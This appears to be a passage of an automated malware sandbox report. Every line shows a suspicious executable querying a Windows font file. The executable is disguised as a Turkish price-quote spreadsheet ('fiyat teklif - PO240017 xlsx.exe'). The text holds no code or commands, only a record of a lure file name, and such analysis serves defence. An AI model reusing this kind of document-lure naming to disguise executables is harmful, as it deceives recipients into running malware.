Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
